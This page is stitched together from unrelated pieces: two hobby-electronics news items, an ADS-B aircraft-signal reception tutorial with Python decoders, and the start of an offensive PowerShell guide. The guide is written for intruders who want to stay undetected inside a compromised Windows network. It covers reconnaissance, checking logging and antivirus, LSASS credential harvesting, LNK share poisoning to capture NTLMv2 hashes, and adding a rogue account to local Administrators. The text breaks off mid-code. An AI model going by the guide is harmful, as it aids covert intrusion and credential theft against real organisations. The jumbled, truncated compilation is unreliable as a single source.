One of the most influential inventions of the 20th century was Big Mouth Billy Bass. A celebrity bigger than the biggest politicians or richest movie stars, there's almost nothing that could beat Billy. That is, until [Kiara] from Kiara's Workshop built a Magikarp version of Big Mouth Billy Bass.
Measuring over two feet long, the orange carp can dance, sing, and stun the crowd. Magikarp works the same way as its predecessor: a small button underneath starts the show. Of course, this did not come without its challenges.
Starting the project was easy: a model found online and some Blender work to create a basic mold. Dissecting Big Mouth Billy Bass gave direct inspiration for how to construct the new idol in terms of servos and joints. Programming wasn't much work either, thanks to Bottango for the animations. Filling the mold with silicone proved to be more of a challenge.
After multiple attempts with minor variations in procedure, [Kiara] got the fish star's skin just right. All it took was a paint job and some foam filling for the final touches. While this wasn't the most mechanically challenging animatronic project, we have seen our fair share of more advanced mechanics. For example, check out this animatronic that sees through its own eyes!
The Sharp PC-G801 was an impressive little pocket computer when it debuted in 1988. However, in 2025, a Z80-compatible machine with just 8 kB of RAM is hardly much to get excited about. [shiura] decided to take one of these old machines and upgrade it into something more modern and useful.
The build keeps the best parts of the Sharp design, namely the case and the keypad. The original circuit board has been entirely ripped out, and a custom PCB was designed to interface with the membrane keypad and host the new internals. [shiura] landed on the Raspberry Pi Zero 2W to run the show. It's a capable machine that runs Linux rather well and has wireless connectivity out of the box. It's paired with an ESP32-S3 microcontroller that handles interfacing with all the various parts of the original Sharp hardware. It also handles the connection to the 256×64 OLED display. The new setup can run in ESP32-only mode, where it acts as a classic RPN-style calculator. Alternatively, the Pi Zero can be powered up for a full-fat computing experience.
Every few minutes an airplane may fly over your head, maybe more than one. If you live close to an airport, the air traffic in your area is especially heavy. Services like Flightradar24 show information about aircraft in the air with surprising accuracy because they get data using the ADS-B protocol. You can collect that data yourself, and here we will show how.
Of course, everyone has flown on a plane or at least seen one. These large metal birds circle the globe and carry hundreds of millions of people to different parts of the world. That wasn't always the case. Just 100 years ago people mostly moved by land and there were no highly reliable flying machines. After planes were invented and commercial flights began, it became clear that we needed a way to track aircraft in the sky, otherwise accidents would be unavoidable. Radar and visual observation are not enough for this, so radio communication came into use. Now every aircraft has an aviation transponder on board. It makes life much easier for controllers and pilots, as the aircraft sends data from onboard sensors and receives instructions from the ground while in flight.
Put simply, an aviation transponder is a two-way radio device that does two things:
1. Answers queries from ground stations: when an air traffic controller requests data, the transponder replies automatically. A query for data is also called interrogation.
2. Acts as an airborne radio beacon: in this mode the transponder periodically broadcasts information about itself, for example position or speed.
Modes
There are different generations or modes of transponders. Each was created for different purposes and has its own signal structure. Although newer modes keep the features of the older ones, the signal protocols are not mutually compatible. There are five main modes:
1. Mode A: transmits only the aircraft's identification code. This code can be hard-programmed into the transponder or assigned by the controller before flight. In practice Mode A was mostly used to track which aircraft was at which airport.
2. Mode C: developed later, it allowed tracking not only the aircraft ID but also flight altitude. Its main advantage was that altitude could be obtained automatically without asking the pilot.
3. Mode S: this is the modern mode used on about 99% of all aircraft today. It allows not only reading sensor data from the aircraft but also sending data back to the plane. In Mode S an aircraft has full two-way communication with ground stations. ADS-B, which we will look at today, is part of this mode.
4. Mode 4 and Mode 5: these are more advanced but used only by the military. Both are much better protected (that is, they have some security, unlike the older modes), so they are not something we can play with.
A careful reader will notice we did not include Mode B or Mode D in the list. Both existed only briefly, so it makes little sense to discuss them here.
ADS-B
If you read the description of Mode S closely, you'll notice that Mode S messages are normally sent by the transponder in response to a ground station query. All of them except ADS-B. ADS-B stands for Automatic Dependent Surveillance Broadcast. In plain English that means it is an automatic flight-tracking system. The word "Broadcast" means the messages are sent out to everyone, not to a specific recipient, and that is what lets us receive them.
Many people treat ADS-B as a separate transponder mode on the same level as Mode A, C, or S, but actually ADS-B is just a part of Mode S. An ADS-B message is simply a Mode S message with type 17.
Types of Mode S messages
We will focus on ADS-B (type 17) in this article, but it helps to know about other Mode S message types for context:
All-call reply (type 11): the transponder replies to a ground interrogation with a unique 24-bit identifier. This number is usually programmed at the factory and does not change, although in military contexts it may be altered.
ACAS short and long replies (type 0/16): messages used by collision-avoidance systems. If a transponder detects another aircraft nearby it will send alerts to other systems that can prevent a mid-air collision.
Altitude and identity replies (type 4/5): messages containing altitude and the call sign (the so-called squawk code that the pilot enters before flight).
Comm-B (type 20/21): messages with readings from onboard sensors, planned route, and other data useful for aircraft control.
ACAS is especially clever in how it works, but discussing it in detail would take us beyond this article.
All Mode S transmissions to aircraft use 1030 MHz (uplink), and transmissions from aircraft to the ground use 1090 MHz.
The radio transmission itself is not encrypted. It carries a lot of useful information about the aircraft's position, altitude, speed, and other parameters. That is how services like Flightradar24 started making aircraft information available to everyone for free. These services collect data from many sensors installed by volunteers around the world. You can become one of those volunteers too. All you need is to sign up and get a receiver from a service operator for installation.
Physical structure of the signal
ADS-B signals are transmitted by aircraft on 1090 MHz, just like the other Mode S signals. The other frequency, 1030 MHz (uplink), is not needed for ADS-B because ADS-B transmissions are sent without being asked.
Pulse-Position Modulation (PPM) is used to encode the signal. In basic terms, the transmitter sends bits over the air that can be read by sampling the signal every N microseconds. On ADS-B each bit lasts 0.5 microseconds, so you can sample every 0.5 μs, see whether the signal level is high or low at each moment, record that, then convert the result into bytes to reconstruct the original message. That's the theory; in practice it's more challenging.
Packet structure
If you take the raw sampled data you first get a bit of a mess that must be parsed to extract useful information. The messages themselves have a clear structure, so if you can find repeated parts in the data stream you can reconstruct the whole packet. A packet consists of a preamble and the data payload. The preamble lasts 8 μs, and then the data follows for either 56 or 112 μs.
The preamble is especially important because all aircraft transmit on the same frequency and their signals can arrive at the receiver at the same time. Loss of overlapping signals is handled simply: if a receiver fails to catch a message, some other receiver will. There are many receivers and they cover all inhabited land on Earth, so if a particular signal is too weak for one receiver it will be loud enough for another. This approach doesn't guarantee every single signal will be caught, but ADS-B messages are transmitted repeatedly, so losing some packets is not a disaster.
We already said each bit is encoded as 0.5 μs, but to make reception easier a convention was introduced where one real bit is encoded using two half-microsecond elements. A logical one is encoded as "1 then 0", and a logical zero as "0 then 1". For example, data bits 1011 would be transmitted as 10011010. This does not complicate the receiver much, but it protects against noise and makes the signal more reliable. Without this doubling, a sequence of zeros would look like silence. With it the receiver always detects activity, even when zeros are sent.
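As an added example (not code from the original article), here is a small Python demodulator for the scheme just described: it searches a stream of 0.5 μs samples for the preamble, splits what follows into chip pairs, and rejects any pair that is neither "10" nor "01". The 16-slot preamble pattern is assumed from the Mode S specification rather than taken from the article, and the sample stream is constructed.

```python
"""Find a Mode S preamble in a stream of 0.5 us samples and recover the data bits.

Added example, not code from the original article. The sample stream below is
constructed (bits 1011 encoded after a preamble); the preamble pattern is
assumed from the Mode S specification rather than taken from the article.
"""

# The Mode S preamble at 0.5 us resolution: pulses at 0.0, 1.0, 3.5 and 4.5 us
# over a total of 8 us (16 half-microsecond slots). Assumed from the spec.
PREAMBLE = [1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0]


def ppm_encode(bits):
    """Encode data bits as PPM chip pairs: 1 -> '10', 0 -> '01'."""
    chips = []
    for b in bits:
        chips.extend((1, 0) if b else (0, 1))
    return chips


def ppm_decode(chips):
    """Decode chip pairs back to bits.

    A pair of 00 or 11 is not a valid PPM symbol: it means noise, a fade, or
    two overlapping transmissions. Such symbols decode to None so the caller
    can discard the frame instead of silently guessing.
    """
    if len(chips) % 2:
        raise ValueError("chip stream must contain whole pairs")
    bits = []
    for i in range(0, len(chips), 2):
        pair = (chips[i], chips[i + 1])
        if pair == (1, 0):
            bits.append(1)
        elif pair == (0, 1):
            bits.append(0)
        else:
            bits.append(None)
    return bits


def find_preamble(samples, start=0):
    """Index of the first exact preamble match at or after start, or -1."""
    n = len(PREAMBLE)
    for i in range(start, len(samples) - n + 1):
        if samples[i:i + n] == PREAMBLE:
            return i
    return -1


def demodulate(samples, nbits):
    """Locate a frame in the sample stream and return (bits, preamble_offset).

    Returns (None, -1) if no clean frame was found. Frames containing any
    invalid symbol are rejected, as a real receiver does before the CRC stage.
    """
    pos = 0
    while True:
        pos = find_preamble(samples, pos)
        if pos < 0:
            return None, -1
        data_start = pos + len(PREAMBLE)
        chips = samples[data_start:data_start + 2 * nbits]
        if len(chips) == 2 * nbits:
            bits = ppm_decode(chips)
            if None not in bits:
                return bits, pos
        pos += 1


# Constructed sample stream: a few idle slots, the preamble, then bits 1011.
SAMPLES = [0, 0, 0] + PREAMBLE + ppm_encode([1, 0, 1, 1]) + [0, 0]

if __name__ == "__main__":
    print("PPM for 1011:", "".join(map(str, ppm_encode([1, 0, 1, 1]))))
    print("decoded:", demodulate(SAMPLES, 4))
```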
Structure of useful data
Suppose we decoded the signal and found a message. Now we need to decode the payload and filter out unwanted messages (that is, all Mode S messages except ADS-B).
The ADS-B message length we care about is 112 μs, which corresponds to 112 bits (thanks to the two-half-microsecond coding!). The message divides into five main blocks:
1. DF (Downlink Format): the format code, 5 bits. For ADS-B this is always 17.
2. CA (Transponder capability): type of transponder and its capability level, 3 bits. This tells a controller what data can be requested from this transponder. This field can be 0, 4, 5, or 6. Values 1 to 3 and 7 are reserved for future use. 0 means a first-level transponder, usually without ACAS. 4 means a second-level (or higher) transponder that can send altitude (i.e., supports Mode C and Mode S) but does not have ACAS. 5 and 6 are like 4 but with ACAS support: 6 indicates ACAS may be enabled, 5 indicates ACAS may be present but disabled.
3. ICAO: unique aircraft number, 24 bits. This number identifies the signal sender. It is typically programmed once at the factory and does not change during operation, although some people know how to change it. Military transponders follow different rules, so anything can happen there.
4. ME (Message): the actual payload with data about altitude, speed, or other information. Length is 56 bits. We will look at this block in detail below.
5. PI (Parity/Interrogator ID): checksum, 24 bits.
The ME field
The ME field is the most interesting part for us because it carries coordinates, speed, altitude, and other data from onboard sensors. Since 56 bits are not enough to carry all possible data at once, each message has a type indicated by the first five bits of ME. In other words, there is a nested format: Mode S uses a certain message type to indicate ADS-B, and ADS-B uses its own internal type to say what data is inside.
ADS-B defines 31 data types in total, but we will review only the main ones. Type 1-4: identification messages. They contain the call sign and other registration/identification information (for example, whether this is a light aircraft or a heavy one). These call signs are shown on airport displays and usually reflect the flight number. A decoded message looks approximately like this:
Type 5-8: ground position. These messages are used to know where and on which runway the aircraft is located. The message may include latitude, longitude, speed, and heading. Example decoded message:
Type 9-19: airborne position (usually transmitted together with altitude). It is important to understand that you will not always find latitude and longitude in the usual long numeric form in these messages, instead a compact notation is used.
Type 19: aircraft velocity.
We could go bit-by-bit through the structure of each message, but that takes a long time. If you are really interested you can find ready ADS-B parsers on GitHub and inspect the formats there. For our purpose, however, diving deeper into the protocol's details isn't necessary right now, because we are not going to transmit anything yet.
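As an added example that is not from the article or from dump1090, the following Python splits a 112-bit frame into the five blocks described above, checks the PI field, and decodes the call sign of a type 1-4 identification message. The 24-bit CRC generator polynomial and the 6-bit call sign alphabet are assumed from the Mode S specification; the test frame is a real identification message reproduced in public decoding guides.

```python
"""Split a 112-bit Mode S frame into DF, CA, ICAO, ME and PI, and verify the parity.

Added example, not code from the original article or from dump1090. The sample
frame is a real ADS-B identification message reproduced in public decoding
guides (callsign KLM1023); the CRC generator polynomial and the 6-bit callsign
alphabet are assumed from the Mode S specification, not taken from the article.
"""

# Generator polynomial of the 24-bit Mode S CRC, including the implicit x^24 term.
GENERATOR = 0x1FFF409

# 6-bit character set used in identification messages (index = 6-bit value).
CALLSIGN_CHARS = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ##### ###############0123456789######"


def hex_to_bits(hexmsg):
    return [int(c) for c in bin(int(hexmsg, 16))[2:].zfill(len(hexmsg) * 4)]


def bits_to_int(bits):
    value = 0
    for b in bits:
        value = (value << 1) | b
    return value


def crc_remainder(bits):
    """Long division of the bit string by GENERATOR; zero means parity checks out."""
    reg = 0
    for b in bits:
        reg = (reg << 1) | b
        if reg & 0x1000000:
            reg ^= GENERATOR
    return reg & 0xFFFFFF


def with_parity(bits88):
    """Append the 24-bit PI field to the first 88 bits, as a DF17 transponder does
    (for DF17 the PI field is the plain CRC, with no interrogator ID mixed in)."""
    if len(bits88) != 88:
        raise ValueError("expected 88 bits")
    return bits88 + hex_to_bits("%06X" % crc_remainder(bits88 + [0] * 24))


def decode_callsign(me_bits):
    """Identification messages (TC 1-4): eight 6-bit characters after TC and category."""
    chars = [CALLSIGN_CHARS[bits_to_int(me_bits[i:i + 6])] for i in range(8, 56, 6)]
    return "".join(chars).replace("#", "").strip()


def parse_frame(hexmsg):
    """Return the fields of a 112-bit frame; ADS-B is DF 17 with a 5-bit type code in ME."""
    bits = hex_to_bits(hexmsg)
    if len(bits) != 112:
        raise ValueError("only 112-bit (long) frames are handled here")
    frame = {
        "df": bits_to_int(bits[0:5]),
        "ca": bits_to_int(bits[5:8]),
        "icao": "%06X" % bits_to_int(bits[8:32]),
        "tc": bits_to_int(bits[32:37]),
        "pi": "%06X" % bits_to_int(bits[88:112]),
        "crc_ok": crc_remainder(bits) == 0,
    }
    if frame["df"] == 17 and 1 <= frame["tc"] <= 4:
        frame["callsign"] = decode_callsign(bits[32:88])
    return frame


# Captured identification message reproduced from public decoding guides.
SAMPLE = "8D4840D6202CC371C32CE0576098"

if __name__ == "__main__":
    print(parse_frame(SAMPLE))
```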
CPR or how to make a simple thing more complex
To describe a location, we usually use latitude and longitude. A 32-bit floating-point number can store them with about seven decimal places, which is accurate down to a few centimeters. If we don't need that much detail and are fine with accuracy of just tens of centimeters, both latitude and longitude together could be stored in about 56 bits. That would have been enough, and there would be no need for special "compressed" coordinate tricks. Since an airplane moves at more than 100 meters per second, centimeter-level accuracy is useless anyway. This makes it strange that the protocol designers still chose the compact method.
CPR (Compact Position Reporting) is designed specifically to send coordinates compactly. Part of CPR was already visible in the coordinate example earlier. Because it's impossible to compress a lot of data into a small field without loss, the designers split the data into parts and send them in two passes with packets labeled "even" and "odd". How do we recover normal coordinates from this? We will show the idea.
Imagine all aircraft flying in a 2D plane. Divide that plane into two different grids and call them the even grid and the odd grid. Make the even grid 4×4 and the odd grid 5×5. Suppose we want to transmit a position that in a 16×16 grid is at (9, 7). If we had one grid we would just send 9 and 7 and an operator could locate us on the map. In CPR there are two grids, though.
In these grids we would represent our position (9, 7) as (1, 3) on the even grid and (4, 2) on the odd grid. When an operator receives both messages, they must align the two grids.
If you overlay the grids with the received coordinates, the point of intersection is the true location.
We described the algorithm without math so you can imagine how coordinates are reconstructed from two parts. The real grids are far more complex than our toy example and look like the image below.
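The real algorithm, carried through in Python as an added example (not the article's own code): an even and an odd airborne position message are combined into a latitude and longitude, the same idea as the two overlaid grids above. The zone constants (NZ = 15 and the NL function) are assumed from the Mode S specification, and the even/odd pair is a captured example reproduced in public decoding guides.

```python
"""Global CPR decoding: recover latitude and longitude from an even and an odd
airborne position message (ADS-B type codes 9-18).

Added example, not code from the original article. The two frames are a real
even/odd pair reproduced in public ADS-B decoding guides; the grid constants
(NZ = 15 and the NL function) are assumed from the Mode S specification.
"""
import math

NZ = 15  # number of latitude zones between the equator and a pole


def hex_to_bits(hexmsg):
    return [int(c) for c in bin(int(hexmsg, 16))[2:].zfill(len(hexmsg) * 4)]


def bits_to_int(bits):
    value = 0
    for b in bits:
        value = (value << 1) | b
    return value


def cpr_fields(hexmsg):
    """Return (odd_flag, lat_cpr, lon_cpr) from a 112-bit airborne position frame.

    Inside ME (frame bits 32..87): TC 5, surveillance status 2, single-antenna 1,
    altitude 12, time 1, CPR odd/even flag 1, latitude 17, longitude 17.
    """
    bits = hex_to_bits(hexmsg)
    tc = bits_to_int(bits[32:37])
    if not 9 <= tc <= 18:
        raise ValueError("not an airborne position message (TC %d)" % tc)
    odd = bits[53]
    lat_cpr = bits_to_int(bits[54:71]) / 131072.0  # 17-bit fraction of a zone
    lon_cpr = bits_to_int(bits[71:88]) / 131072.0
    return odd, lat_cpr, lon_cpr


def nl(lat):
    """Number of longitude zones at a given latitude (fewer zones near the poles)."""
    if lat == 0:
        return 59
    if abs(lat) == 87:
        return 2
    if abs(lat) > 87:
        return 1
    a = 1 - math.cos(math.pi / (2 * NZ))
    b = math.cos(math.radians(lat)) ** 2
    return int(math.floor(2 * math.pi / math.acos(1 - a / b)))


def decode_global(even_hex, odd_hex, newest_is_even=True):
    """Combine the even and odd grids; returns (lat, lon) or None if they disagree."""
    f_e, lat_e, lon_e = cpr_fields(even_hex)
    f_o, lat_o, lon_o = cpr_fields(odd_hex)
    if f_e != 0 or f_o != 1:
        raise ValueError("need one even and one odd message")

    # Latitude: zone sizes are 360/60 (even) and 360/59 (odd); j is the zone index
    # that makes both grids agree. Python's % keeps the index non-negative.
    dlat_e, dlat_o = 360.0 / 60, 360.0 / 59
    j = math.floor(59 * lat_e - 60 * lat_o + 0.5)
    lat_even = dlat_e * (j % 60 + lat_e)
    lat_odd = dlat_o * (j % 59 + lat_o)
    if lat_even >= 270:
        lat_even -= 360
    if lat_odd >= 270:
        lat_odd -= 360
    # Both solutions must lie in the same longitude-zone band, or the pair is
    # from different zones (too far apart in time) and must not be combined.
    if nl(lat_even) != nl(lat_odd):
        return None

    lat = lat_even if newest_is_even else lat_odd
    n = nl(lat)
    # Longitude: the even grid has NL zones, the odd grid NL-1; m is the zone index.
    m = math.floor(lon_e * (n - 1) - lon_o * n + 0.5)
    if newest_is_even:
        ni = max(n, 1)
        lon = (360.0 / ni) * (m % ni + lon_e)
    else:
        ni = max(n - 1, 1)
        lon = (360.0 / ni) * (m % ni + lon_o)
    if lon >= 180:
        lon -= 360
    return lat, lon


# Even/odd pair from public decoding guides (same aircraft, a few seconds apart).
EVEN = "8D40621D58C382D690C8AC2863A7"
ODD = "8D40621D58C386435CC412692AD6"

if __name__ == "__main__":
    print(decode_global(EVEN, ODD))
```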
A simple way to receive ADS-B
Now that we understand the main parts of the protocol, we can try to receive a real signal. To receive any such signal you need three basic things: an antenna, a receiver, and a PC.
Antenna
Start with the most important item, which is the antenna. The choice depends on many factors, including frequency, directionality of the signal, and the environment where it travels. Our signal is transmitted at 1090 MHz, and we will receive it outdoors. The simplest antenna (but not the most efficient) is a straight rod (a monopole). You can make such an antenna from a piece of wire. The main thing is to calculate the right length. Antenna length depends on the wavelength of the signal you want to receive. Wavelength is the distance between two neighboring "peaks" of the wave.
Lambda (λ) is the wavelength. You get it from frequency with the formula λ = c / f, where c is the speed of light and f is the signal frequency. For 1090 MHz it is about 27.5 cm. If you take a metal rod of that length you get a full-wave antenna, which you can safely shorten to a half or a quarter of that length to get a half-wave or quarter-wave antenna, respectively. These designs have different sensitivity, so I recommend a half-wave antenna, which should be roughly 13.75 cm long.
We won't build our own antenna here. It is not the simplest task and we already had a suitable antenna. You might use handheld radio antennas if you receive outdoors and there isn't too much interference. We use a simple vertical coil-loaded whip antenna. It behaves like a whip but is shorter because of the coil.
You can measure antenna characteristics with a special vector network analyzer that generates different frequencies and checks how the antenna reacts.
The output from a NanoVNA looks complicated at first, but it's simple to interpret. To know if an antenna suits a particular frequency, look at the yellow SWR line. SWR stands for standing wave ratio. It shows what part of the signal the antenna radiates into the air and what part is reflected back. The less signal that returns, the better the antenna works at that frequency. On the device we set marker 1 to 1090 MHz and the SWR there was 1.73, which is quite good. Typically an antenna is considered good if SWR is about 1 (and not more than 2).
Receiver
For the receiver we will use an SDR dongle. It's basically a radio controlled by software rather than by a mechanical dial like old receivers. Any SDR adapter will work for ADS-B reception, from the cheap RTL-SDR to expensive devices like the BladeRF. Cheap options start around $30, so anyone can get involved. We will use a BladeRF micro, as it supports a wide frequency range and a high sampling rate.
Putting it all together
Once you have an antenna and an SDR, find a place with few obstructions and low interference. We simply drove about ten kilometers out of town. Signals near 1 GHz (which includes ADS-B) don't travel much past the horizon, so if you don't live near an airport and there are obstacles around, you may not catch anything.
To inspect the radio spectrum we use GQRX. This program is available for Linux and macOS. On Windows we recommend SDR#. In Ubuntu GQRX can be installed from the standard repositories:
$ sudo apt update
$ sudo apt install -y gqrx
Then increase the volume, select your SDR as the input source, and press the large Start button. If everything is set up correctly, your speakers will start hissing loudly enough to make you jump, after which you can mute the sound with the Mute button in the lower right corner.
You can choose the receive frequency at the top of the screen, so set it to 1.090.000, which equals 1090 MHz. After that you will see something like the screenshot below.
The short vertical strips near the center are ADS-B signals, which stand out from the background noise. If you donโt see them, try changing the gain settings on the Input Controls tab on the right. If that does not help, open FFT Settings and adjust the Plot and WF parameters. You can also try rotating the antenna or placing it in different orientations.
dump1090
When you get stable reception in GQRX you can move to the next step.
In practice, people who want to receive and decode Mode S signals usually use an existing program. A common open-source tool demodulates and decodes almost all Mode S signals and even outputs them in a neat table. To verify that our setup works correctly, it's best to start with something that's known to work, which is dump1090.
To install it, clone the repository from GitHub and build the binary. It's very simple:
After that you should have the binary. If you have an RTL-SDR you can use dump1090 directly with it, but we have a BladeRF which requires a bit more work for support.
First, install the driver for your SDR. Drivers are available in the repositories of most distributions, just search for them. Second, you will need to flash special firmware onto the SDR. For BladeRF those firmware files are available on the Nuand website. Choose the file that matches your BladeRF version.
Next, download and build the decoding program for your SDR:
git clone https://github.com/Nuand/bladeRF-adsb
cd bladeRF-adsb/bladeRF_adsb
make
Then flash the firmware into the BladeRF. You can do this with the bladeRF-cli tool:
$ bladeRF-cli -l ~/Downloads/adsbxA4.rbf
Now run dump1090 in one terminal and bladeRF-adsb in another (the commands below are examples from our setup):
If everything is correct, in the dump1090 window you will see many hexadecimal lines, those are Mode S messages that still need to be decoded and filtered.
If you remove --raw from the dump1090 startup arguments, the program will automatically decode messages and display them in a table.
Summary
Now you've seen how aircraft transponders work, what ADS-B actually is, and how signals at 1090 MHz can be received and decoded with simple equipment. None of this requires expensive tools, just an antenna, a software-defined radio and some patience. Once it's ready, you can watch the same kind of live flight data that powers big services like Flightradar24. We kept the heavy math out of the way so it stays approachable for everyone, but it still leaves you with something useful to take away. It's possible to push yourself further and do it the hard way without relying on tools like dump1090, but that path takes a lot more time, patience, and willingness to grind through the details.
We're continuing our look at how PowerShell can be used in offensive operations, but this time with survival in mind. When you're operating in hostile territory, creativity and flexibility keep you alive. PowerShell is a powerful tool and how well it serves you depends on how cleverly you use it. The more tricks you know, the better you'll be at adapting when things get tense. In today's chapter we're focusing on a core part of offensive work, which is surviving while you're inside the target environment. These approaches have proven themselves in real operations. The longer you blend in and avoid attention, the more you can accomplish.
We'll split this series into several parts. This first piece is about reconnaissance and learning the environment you've entered. If you map the perimeter and understand the scope of your target up front, you'll be far better placed to move into exploitation without triggering traps defenders have set up. It takes patience. As OTW says, true compromises usually require time and persistence. Defenders often rely on predictable detection patterns, and that predictability is where many attackers get caught. Neglecting the basics is a common and costly mistake.
When the stakes are high, careless mistakes can ruin everything. You can lose access to a target full of valuable information and damage your reputation among other hackers. That's why we made this guide to help you use PowerShell in ways that emphasize staying undetected and keeping access. Every move should be calculated. Risk is part of the job, but it should never be reckless. That's also why getting comfortable with PowerShell matters, as it gives you the control and flexibility you need to act professionally.
If you read our earlier article PowerShell for Hackers: Basics, then some of the commands in Part 1 will look familiar. In this article we build on those fundamentals and show how to apply them with survival and stealth as the priority.
Basic Reconnaissance
Hostname
Once you have access to a host, perhaps after a compromise or phishing attack, the first step is to find out exactly which system you have landed on. That knowledge is the starting point for planning lateral movement and possible domain compromise:
PS > hostname
Sometimes the hostname is not very revealing, especially in networks that are poorly organized or where the domain setup is weak. On the other hand, when you break into a large company's network, you'll often see machines labeled with codes instead of plain names. That's because IT staff need a way to keep track of thousands of systems without getting lost. Those codes aren't random, they follow a logic. If you spend some time figuring out the pattern, you might uncover hints about how the company structures its network.
System Information
To go further, you can get detailed information about the machine itself. This includes whether it is domain-joined, its hardware resources, installed hotfixes, and other key attributes.
PS > systeminfo
This command is especially useful for discovering the domain name, identifying whether the machine is virtual, and assessing how powerful it is. A heavily provisioned machine is often important. Just as valuable is the operating system type. For instance, compromising a Windows server is a significant opportunity. Servers typically permit multiple RDP connections and are less likely to be personal workstations. This makes them more attractive for techniques such as LSASS and SAM harvesting. Servers also commonly host information that is valuable for reconnaissance, as well as shares that can be poisoned with malicious LNK files pointing back to your Responder.
Once poisoned, any user accessing those shares automatically leaks their NTLMv2 hashes to you, which you can capture and later crack using tools like Hashcat.
OS Version
If your shell is unstable or non-interactive and you cannot risk breaking it with systeminfo, here is your alternative:
Different versions of Windows expose different opportunities for abuse, so knowing the precise version is always beneficial.
Patches and Hotfixes
Determining patch levels is important. It tells you which vulnerabilities might still be available for exploitation. End-user systems tend to be updated more regularly, but servers and domain controllers often lag behind. Frequently they lack antivirus protection, still run legacy operating systems like Windows Server 2012 R2, and hold valuable data. This makes them highly attractive targets.
Many administrators mistakenly believe isolating domain controllers from the internet is sufficient security. The consequence is often unpatched systems. We once compromised an organization in under 15 minutes with the NoPac exploit, starting from a low-privileged account, purely because their DC was outdated.
To review installed hotfixes:
PS > wmic qfe get Caption,Description,HotFixID,InstalledOn
Remember, even if a system is unpatched, modern antivirus tools may still detect exploitation attempts. Most maintain current signature databases.
Defenses
Before proceeding with exploitation or lateral movement, always understand the defensive posture of the host.
Firewall Rules
Firewall configurations can reveal why certain connections succeed or fail and may contain clues about the broader network. You can find this out through passive reconnaissance:
PS > netsh advfirewall show allprofiles
The output may seem overwhelming, but the more time you spend analyzing rules, the more valuable the information becomes. As you can see above, firewalls can generate logs that are later collected by SIEM tools, so be careful before you initiate any connection.
Antivirus
Antivirus software is common on most systems. Since our objective here is to survive using PowerShell only, we won't discuss techniques for abusing AV products or bypassing AMSI, which are routinely detected by those defenses. That said, if you have sufficient privileges you can query installed security products directly to learn what's present and how they're configured. You might be lucky enough to find a server with no antivirus at all, but you should treat that as the exception rather than the rule.
This method reliably identifies the product in use, not just Microsoft Defender. For more details, such as signature freshness and scan history, run this:
PS > Get-MpComputerStatus
To maximize survivability, avoid using malware on these machines. Even if logging is not actively collected, you must treat survival mode as if every move is observed. The lack of endpoint protection does not let you do everything. We saw people install Gsocket on Linux boxes thinking it would secure access, but in reality network monitoring quickly spotted those sockets and defenders shut them down. Same applies to Windows.
Script Logging
Perhaps the most important check is determining whether script logging is enabled. This feature records every executed PowerShell command.
If EnableScriptBlockLogging is set to 1, all your activity is being stored in the PowerShell Operational log. Later we will show you strategies for operating under such conditions.
Users
Identifying who else is present on the system is another critical step.
The quser command is user-focused, showing logged-in users, idle times, and session details:
PS > quser
Meanwhile, qwinsta is session-focused, showing both active and inactive sessions. This is particularly useful when preparing to dump LSASS, as credentials from past sessions often remain in memory. It also shows the connection type, whether console or RDP.
PS > qwinsta
Network Enumeration
Finding your way through a hostile network can be challenging. Sometimes you stay low and watch, sometimes you poke around to test the ground. Here are the essential commands to keep you alive.
ARP Cache
The ARP table records known hosts with which the machine has communicated. It is both a reconnaissance resource and an attack surface:
PS > arp -a
ARP entries can reveal subnets and active hosts. If you just landed on a host, this could be valuable.
Note: a common informal convention is that smaller organizations use the 192.168.x.x address space, mid-sized organizations use 172.16.x.x to 172.31.x.x, and larger enterprises operate within 10.0.0.0/8. This is not a rule, but it is often true in practice.
Known Hosts
SSH is natively supported on modern Windows but less frequently used, since tools like PuTTY are more common. Still, it is worth checking for known hosts, as they might give you insights about the network segmentation and subnets:
PS > cat $env:USERPROFILE\.ssh\known_hosts
Routes
The route table exposes which networks the host is aware of, including VLANs, VPNs, and static routes. This is invaluable for mapping internal topology and planning pivots:
PS > route print
Learning how to read the output can take some time, but it's definitely worth it. We know many professional hackers who use this command as part of their recon toolbox.
Interfaces
Knowing the network interfaces installed on compromised machines helps you understand connectivity and plan next steps. Always record each host and its interfaces in your notes:
PS > ipconfig /all
Maintaining a record of interfaces across compromised hosts prevents redundant authentication attempts and gives a clearer mindmap of the environment.
Net Commands
The net family of commands remains highly useful, though they are often monitored. Later we will discuss bypass methods. For now, let's review their reconnaissance value.
Password Policy
Knowing the password policy helps you see if brute force or spraying is possible. But keep in mind, these techniques are too noisy for survival mode:
PS > net accounts /domain
Groups and Memberships
Local groups, while rarely customized in domain environments, can still be useful:
PS > net localgroup
Domain groups are far more significant:
PS > net group /domain
Checking local Administrators can show privilege escalation opportunities:
PS > net localgroup Administrators
Investigating domain group memberships often reveals misconfigured privileges:
PS > net group <group_name> /domain
With sufficient rights, groups can be manipulated:
PS > net localgroup Administrators hacker /add
PS > net group "Marketing" user /add /domain
However, directly adding accounts to highly privileged groups like Domain Admins is reckless. These groups are closely monitored. Experienced hackers instead look for overlooked accounts, such as users with the "password not required" attribute or exposed credentials in LDAP fields.
Domain Computers and Controllers
Domain computer lists reveal scope, while controllers are critical to identify and study:
PS > net group "Domain Computers" /domain
PS > net group "Domain Controllers" /domain
Controllers in particular hold the keys to Active Directory. LDAP queries against them can return huge amounts of intelligence.
Domain Users
Enumerating users gives you account names to work with. Administrators often use purpose-based prefixes such as "adm" for privileged accounts or "svc" for service accounts, and the description field sometimes contains role notes or even credential hints.
PS > net user /domain
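The plain user list does not show the description field or the account flags the text says to look for, so as an added example (not code from the original post) the query below pulls exactly those attributes with the built-in [adsisearcher] type (System.DirectoryServices, present on every Windows box, no RSAT needed). It covers both the "overlooked accounts" from the groups section above and the prefix and description hints from this one: users named adm*/svc*, descriptions that look like they hold a credential, and accounts flagged PASSWD_NOTREQD (userAccountControl bit 0x20). The prefix and keyword lists are assumptions; adjust them to the naming convention you see in the net user output.

```powershell
# Added example, not part of the original post: one server-side LDAP query for
# the accounts worth a second look, using the built-in [adsisearcher]
# (System.DirectoryServices). Prefixes and keywords below are assumptions.

function Find-InterestingDomainUsers {
    param(
        [string[]] $Prefixes = @('adm', 'svc', 'sql', 'backup'),
        [string[]] $Keywords = @('pass', 'pwd', 'cred', 'login')
    )
    # Build one LDAP filter instead of pulling every user and filtering locally.
    # 1.2.840.113556.1.4.803 is the bitwise-AND matching rule; 32 = PASSWD_NOTREQD.
    $prefixClause  = ($Prefixes | ForEach-Object { "(sAMAccountName=$_*)" }) -join ''
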